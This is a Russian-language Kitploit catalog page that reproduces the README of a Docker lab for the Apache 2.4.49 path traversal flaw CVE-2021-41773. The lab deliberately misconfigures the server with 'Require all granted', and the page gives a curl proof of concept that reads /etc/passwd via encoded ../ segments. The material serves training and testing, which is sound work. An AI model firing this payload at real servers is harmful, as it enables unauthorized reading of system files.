Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-41773 — Docker-based лабораторная среда для уязвимости обхода пути CVE-2021-41773 в Apache с PoC-эксплойтом и подробным руководством для тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/jiyun02/cve-2021-41773
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Docker-based лабораторная среда для уязвимости обхода пути CVE-2021-41773 в Apache с PoC-эксплойтом и подробным руководством для тестирования безопасности и обучения.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 – Apache Path Traversal: отчёт


Краткое описание

  • Уязвимость, обнаруженная в Apache HTTP Server 2.4.49, которая в зависимости от конфигурации веб-сервера может раскрывать конфиденциальные файлы системы через атаку Path Traversal
  • Path Traversal: злоумышленник может получить доступ к файлам за пределами веб-корня, используя пути, содержащие ../

Информация

  • Название уязвимости: CVE-2021-41773
  • Затронутые версии: Apache HTTP Server 2.4.49
  • Тип уязвимости: Path Traversal
  • Наличие официального патча: исправлено в версии 2.4.50 и выше

Настройка лабораторного окружения

  • Базовый образ: 'httpd:2.4.49' (DockerHub)
  • Способ запуска контейнера: Dockerfile + docker-compose.yml
  • Порт: 8080 → подключение к порту 80 контейнера
  • Изменение конфигурации Apache: 'Require all granted' (разрешает Path Traversal)

Как запустить окружение

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

  • PoC уязвимости

    • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

    Подробный процесс

    1. Подготовка директории для задания image
    image
    1. Создание Dockerfile image

    -> Базовый образ: httpd:2.4.49 (версия с уязвимостью)

    -> 'sed -i 's/Require all denied/Require all granted/g' : разрешение Path Traversal и внешнего доступа

    1. docker-compose.yml image

    -> Определение Apache

    -> Проброс порта 8080 на порт 80 контейнера

    1. Запуск docker

      image
    2. Выполнение PoC

      image

    -> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

    -> /etc/passwd содержит конфиденциальную информацию; %2e — это закодированный вариант .., который означает переход в родительский каталог

    -> Манипулируя путём, сервер обращается к /etc/passwd и выводит его содержимое

    1. Результат выполнения image

    -> Как показано на изображении выше, возможен доступ к конфиденциальным каталогам


    URL репозитория, доступного через Fork

    https://github.com/JIYUN02/cve-2021-41773

    -> Имеется история коммитов

    Скачать инструмент